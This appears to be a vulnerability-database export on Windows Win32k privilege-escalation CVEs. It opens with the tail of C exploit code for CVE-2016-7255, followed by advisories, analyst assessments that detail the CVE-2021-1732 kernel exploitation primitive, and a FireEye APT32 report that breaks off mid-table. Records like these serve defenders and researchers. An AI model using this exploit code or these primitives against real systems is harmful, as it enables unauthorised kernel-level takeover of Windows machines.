#ifdef _WIN64\n\t\t\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\n\t\tDebugBreak();\n\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild , GetDesktopWindow() );\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\t\t\n\t\tSwitchToThisWindow(hWndChild , TRUE);\n\t\t\n\t\t_sim_alt_shift_esc();\n\n\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\n\t\t{\t\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t}\n\t\n\n\t} while (FALSE);\n\n\tif ( NULL != hWndParent )\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif ( NULL != hWndChild )\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\n\n\treturn 0;\n}\n\nint __cdecl wmain(int nArgc, WCHAR** Argv)\n{\n\tdo \n\t{\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\n\t} while (FALSE);\n\t\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-11-03T16:41:49", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2016-7255", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2021-07-27T00:00:00", "id": "AKB:72C050B4-DAF1-455C-A49A-FECD7DBEBFF3", "href": "https://attackerkb.com/topics/WhUsVvgJrc/cve-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T18:12:10", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-1732", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-04T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": "https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-17T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T20:31:16", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 18, 2022 4:35pm UTC reported:\n\nLooks like this is a LPE in win32k that is being exploited in the wild according to Microsoft to let attackers escalate their privileges to SYSTEM. Attack complexity on this is high which is understandable given the history of win32k and the complexities regarding its architecture which was built before modern security mitigations were implemented. With that being said though the finder of this bug, at <https://twitter.com/b2ahex/status/1481233350840893442>, notes that exploitation is easy and that this is a patch bypass for CVE-2021-1732, which was a window object type confusion leading to an OOB (out-of-bounds) write as noted by McAfee\u2019s technical writeup at <https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/technical-analysis-of-cve-2021-1732/>.\n\nOf particular note here is that they credit Big CJTeam of Tianfu Cup and RyeLv aka @b2ahex on Twitter for finding this vulnerability. They note that this was exploited in the wild but the mention of Tianfu Cup is interesting as it suggests this was also reported to China\u2019s government via the Chinese Tianfu Cup hacking competition.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "href": "https://attackerkb.com/topics/KBiVbKrlyU/cve-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:19", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2016-11-08T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-08T00:00:00", "id": "SMNTC-94064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94064", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:14", "description": "An elevation of privilege vulnerability exists in Microsoft Windows Win32k. A remote attacker can bypass a security check in win32k when Microsoft Windows improperly deals with one of its kernel components. A successful exploitation could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Win32k Elevation of Privilege (MS16-135: CVE-2016-7255)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2019-12-17T00:00:00", "id": "CPAI-2016-0979", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:15", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-1732)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CPAI-2021-0032", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2021-12-06T18:25:24", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7255", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:07", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1732. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2021-1698", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:08", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | 